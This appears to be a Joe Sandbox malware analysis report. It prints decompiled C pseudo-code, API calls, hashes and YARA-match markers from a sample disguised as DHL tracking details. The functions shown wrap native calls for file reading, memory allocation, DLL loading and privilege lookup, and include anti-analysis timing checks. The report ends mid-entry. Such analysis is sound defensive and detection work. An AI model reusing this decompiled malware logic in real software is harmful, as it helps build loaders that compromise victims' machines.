                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharPrevlstrlen
                    • String ID: C:\Users\user\Desktop
                    • API String ID: 2709904686-3125694417
                    • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                    • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                    • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004056D1(CHAR* _a4, CHAR* _a8) {
                    				int _t10;
                    				int _t15;
                    				CHAR* _t16;
                    
                    				_t15 = lstrlenA(_a8);
                    				_t16 = _a4;
                    				while(lstrlenA(_t16) >= _t15) {
                    					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                    					_t10 = lstrcmpiA(_t16, _a8);
                    					if(_t10 == 0) {
                    						return _t16;
                    					}
                    					_t16 = CharNextA(_t16);
                    				}
                    				return 0;
                    			}







                    APIs
                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: lstrlen$CharNextlstrcmpi
                    • String ID:
                    • API String ID: 190613189-0
                    • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                    • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                    • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:2.7%
                    Signature Coverage:5.8%
                    Total number of Nodes:549
                    Total number of Limit Nodes:64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                    C-Code - Quality: 37%
                    			E0041A40A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                    				void* _t21;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr* _t32;
                    				void* _t34;
                    
                    				_t16 = _a4;
                    				_t32 = _a4 + 0xc48;
                    				E0041AF60(_t30, _t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                    				_t4 =  &_a40; // 0x414a31
                    				_t6 =  &_a32; // 0x414d72
                    				_t12 =  &_a8; // 0x414d72
                    				_t21 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t31, _t34); // executed
                    				return _t21;
                    			}









                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: 6f3bbb242c56fe18ca81c1544d15f7c1d6522fee8eecbdcd7e4e071b46f430e3
                    • Instruction ID: 160008e4773b1b80f1a6a88fe42ab6d3d0e4feea498ae17a6bcea7275b4de0a4
                    • Opcode Fuzzy Hash: 6f3bbb242c56fe18ca81c1544d15f7c1d6522fee8eecbdcd7e4e071b46f430e3
                    • Instruction Fuzzy Hash: A5F0F9B6200108AFCB04DF89CC90DEB77A9EF8C754F158248FE1D97241D630E811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                    C-Code - Quality: 37%
                    			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                    				void* _t18;
                    				void* _t27;
                    				intOrPtr* _t28;
                    
                    				_t13 = _a4;
                    				_t28 = _a4 + 0xc48;
                    				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                    				_t4 =  &_a40; // 0x414a31
                    				_t6 =  &_a32; // 0x414d72
                    				_t12 =  &_a8; // 0x414d72
                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                    				return _t18;
                    			}







                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 219 40acf0-40ad0c 220 40ad14-40ad19 219->220 221 40ad0f call 41cc50 219->221 222 40ad1b-40ad1e 220->222 223 40ad1f-40ad2d call 41d070 220->223 221->220 226 40ad3d-40ad4e call 41b4a0 223->226 227 40ad2f-40ad3a call 41d2f0 223->227 232 40ad50-40ad64 LdrLoadDll 226->232 233 40ad67-40ad6a 226->233 227->226 232->233
                    C-Code - Quality: 100%
                    			E0040ACF0(void* _a4, intOrPtr _a8) {
                    				char* _v8;
                    				struct _EXCEPTION_RECORD _v12;
                    				struct _OBJDIR_INFORMATION _v16;
                    				char _v536;
                    				void* _t15;
                    				struct _OBJDIR_INFORMATION _t17;
                    				struct _OBJDIR_INFORMATION _t18;
                    				void* _t30;
                    				void* _t31;
                    				void* _t32;
                    
                    				_v8 =  &_v536;
                    				_t15 = E0041CC50( &_v12, 0x104, _a8);
                    				_t31 = _t30 + 0xc;
                    				if(_t15 != 0) {
                    					_t17 = E0041D070(__eflags, _v8);
                    					_t32 = _t31 + 4;
                    					__eflags = _t17;
                    					if(_t17 != 0) {
                    						E0041D2F0( &_v12, 0);
                    						_t32 = _t32 + 8;
                    					}
                    					_t18 = E0041B4A0(_v8);
                    					_v16 = _t18;
                    					__eflags = _t18;
                    					if(_t18 == 0) {
                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                    						return _v16;
                    					}
                    					return _t18;
                    				} else {
                    					return _t15;
                    				}
                    			}














                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 234 41a35b-41a3b1 call 41af60 NtCreateFile
                    C-Code - Quality: 64%
                    			E0041A35B(intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                    				long _t21;
                    				void* _t31;
                    
                    				asm("cli");
                    				asm("adc [esi-0x1374aab4], ah");
                    				_t15 = _a8;
                    				_t3 = _t15 + 0xc40; // 0xc40
                    				E0041AF60(_t31, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
                    				_t21 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                    				return _t21;
                    			}






                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 3d36fa00f0c0e38b1d16cf1d2e8ad0b499f91c4f865e0299559f20ee5fe15f9b
                    • Instruction ID: 65097f47c13a115ffb2d056c85b6b46217a9acb7e54f30f5b6aee2cd057f8071
                    • Opcode Fuzzy Hash: 3d36fa00f0c0e38b1d16cf1d2e8ad0b499f91c4f865e0299559f20ee5fe15f9b
                    • Instruction Fuzzy Hash: 9501C9B2205108AFDB58CF98DC85DEB77A9EF8C754F15824DFA4D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 237 41a360-41a376 238 41a37c-41a3b1 NtCreateFile 237->238 239 41a377 call 41af60 237->239 239->238
                    C-Code - Quality: 100%
                    			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                    				long _t21;
                    				void* _t31;
                    
                    				_t3 = _a4 + 0xc40; // 0xc40
                    				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                    				return _t21;
                    			}






                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 240 41a53a-41a556 241 41a55c-41a57d NtAllocateVirtualMemory 240->241 242 41a557 call 41af60 240->242 242->241
                    C-Code - Quality: 72%
                    			E0041A53A(void* __ecx, signed int __edx, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                    				intOrPtr _v0;
                    				long _t16;
                    				signed int _t22;
                    				void* _t26;
                    				intOrPtr _t30;
                    
                    				_t22 = __edx ^  *(__ecx - 0x35);
                    				_push(_t22);
                    				 *((intOrPtr*)(_t22 + 0x55)) = _t30;
                    				_push(_t30);
                    				_t12 = _v0;
                    				_t5 = _t12 + 0xc60; // 0xca0
                    				E0041AF60(_t26, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
                    				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                    				return _t16;
                    			}









                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 1b1e39ae1400efc95cc6fb6f20ece6d437dd9711870a2dc52d3c1bdff3ada499
                    • Instruction ID: db8d58c09434d50f862041ea2255eacf7e3858e8d10e0ff27327ab981fd82e52
                    • Opcode Fuzzy Hash: 1b1e39ae1400efc95cc6fb6f20ece6d437dd9711870a2dc52d3c1bdff3ada499
                    • Instruction Fuzzy Hash: 5AF0D4B6200208AFDB14DF89CC81EABB7A9EF8C754F158149BA0997241C635E811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 243 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                    C-Code - Quality: 100%
                    			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                    				long _t14;
                    				void* _t21;
                    
                    				_t3 = _a4 + 0xc60; // 0xca0
                    				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                    				return _t14;
                    			}






                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A490(intOrPtr _a4, void* _a8) {
                    				long _t8;
                    				void* _t11;
                    
                    				_t5 = _a4;
                    				_t2 = _t5 + 0x10; // 0x300
                    				_t3 = _t5 + 0xc50; // 0x40a943
                    				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                    				_t8 = NtClose(_a8); // executed
                    				return _t8;
                    			}






                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_9e0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                    • Instruction ID: 3679f56db154f20b125b2ee624a088cf27215c8a369a8f6811c3a0c659b85df9
                    • Opcode Fuzzy Hash: 6064978d5b080e1ac775bfc0465342ed2542abf0c7954ff6afefc78c22a72080
                    • Instruction Fuzzy Hash: 3990026160100503D21271694404616000AE7D0382F91C032A5014555ECA7589D6F171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00409AB0(intOrPtr _a4) {
                    				intOrPtr _v8;
                    				char _v24;
                    				char _v284;
                    				char _v804;
                    				char _v840;
                    				void* _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				void* _t39;
                    				void* _t50;
                    				intOrPtr _t52;
                    				void* _t53;
                    				void* _t54;
                    				void* _t55;
                    				void* _t56;
                    
                    				_t52 = _a4;
                    				_t39 = 0; // executed
                    				_t24 = E00407EA0(_t52,  &_v24); // executed
                    				_t54 = _t53 + 8;
                    				if(_t24 != 0) {
                    					E004080B0( &_v24,  &_v840);
                    					_t55 = _t54 + 8;
                    					do {
                    						E0041BE10( &_v284, 0x104);
                    						E0041C480( &_v284,  &_v804);
                    						_t56 = _t55 + 0x10;
                    						_t50 = 0x4f;
                    						while(1) {
                    							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                    							_t56 = _t56 + 0x10;
                    							if(_t31 != 0) {
                    								break;
                    							}
                    							_t50 = _t50 + 1;
                    							if(_t50 <= 0x62) {
                    								continue;
                    							} else {
                    							}
                    							goto L8;
                    						}
                    						_t9 = _t52 + 0x14; // 0xffffe045
                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                    						_t39 = 1;
                    						L8:
                    						_t33 = E004080E0( &_v24,  &_v840);
                    						_t55 = _t56 + 8;
                    					} while (_t33 != 0 && _t39 == 0);
                    					_t34 = E00408160(_t52,  &_v24); // executed
                    					if(_t39 == 0) {
                    						asm("rdtsc");
                    						asm("rdtsc");
                    						_v8 = _t34 - 0 + _t34;
                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                    					}
                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                    					_t20 = _t52 + 0x31; // 0x5608758b
                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                    					return 1;
                    				} else {
                    					return _t24;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                    C-Code - Quality: 100%
                    			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                    				void* _t10;
                    				void* _t15;
                    
                    				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                    				_t6 =  &_a8; // 0x414536
                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                    				return _t10;
                    			}

                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 204 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                    C-Code - Quality: 82%
                    			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                    				char _v67;
                    				char _v68;
                    				void* _t12;
                    				intOrPtr* _t13;
                    				int _t14;
                    				long _t21;
                    				intOrPtr* _t25;
                    				void* _t26;
                    
                    				_v68 = 0;
                    				E0041BE60( &_v67, 0, 0x3f);
                    				E0041CA00( &_v68, 3);
                    				_t12 = E0040ACF0(_a4 + 0x1c,  &_v68); // executed
                    				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                    				_t25 = _t13;
                    				if(_t25 != 0) {
                    					_t21 = _a8;
                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                    					_t32 = _t14;
                    					if(_t14 == 0) {
                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                    					}
                    					return _t14;
                    				}
                    				return _t13;
                    			}

                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 246 41a7c3-41a7ea call 41af60 249 41a7ef-41a804 LookupPrivilegeValueW 246->249
                    C-Code - Quality: 46%
                    			E0041A7C3(void* __eax, void* __ebx) {
                    				int _t12;
                    				void* _t19;
                    
                    				_push(ds);
                    				asm("int3");
                    				asm("pushfd");
                    				_t9 =  *0xFFFFFFFFA4B5A4FF;
                    				E0041AF60(_t19,  *0xFFFFFFFFA4B5A4FF,  *0xFFFFFFFFA4B5A4FF + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
                    				_t12 = LookupPrivilegeValueW( *0xFFFFFFFFA4B5A503,  *0xFFFFFFFFA4B5A507,  *0xFFFFFFFFA4B5A50B); // executed
                    				return _t12;
                    			}

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000001.00000002.435840268.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 02d7213a755358cdc406efaebd902722de50c30c7831683f4a74658f7932d97a
                    • Instruction ID: 257231a3eb2c6c55949406b2776163c321740c1ddf42cc11d16627983e803823
                    • Opcode Fuzzy Hash: 02d7213a755358cdc406efaebd902722de50c30c7831683f4a74658f7932d97a
                    • Instruction Fuzzy Hash: 55E092B16002147BDB10DF89CC85EE73BAADF48250F108565FD0CA7751C575E8158BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 250 41a662-41a663 251 41a665-41a66e 250->251 252 41a6ad-41a6d8 call 41af60 ExitProcess 250->252 251->252
                    C-Code - Quality: 53%
                    			E0041A662(void* __eax, void* __eflags, intOrPtr _a4, int _a8, long _a12, void* _a16) {
                    				intOrPtr _v117;
                    				char _t20;
                    				void* _t26;
                    				void* _t31;
                    
                    				asm("outsb");
                    				if(__eflags >= 0) {
                    					asm("sbb cl, [ecx]");
                    					__eflags = _t26 - _v117;
                    					_t13 = _a4;
                    					E0041AF60(_t31, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t13 + 0xa14)), 0, 0x36);
                    					ExitProcess(_a8);
                    				}
                    				asm("sbb eax, 0x23c66e19");
                    				asm("int 0xe2");
                    				_push(_t36);
                    				_t17 = _a4;
                    				_push(_t32);
                    				_t3 = _t17 + 0xc74; // 0xc74
                    				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                    				_t20 = RtlFreeHeap(_a8, _a12, _a16); // executed
                    				return _t20;
                    			}

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
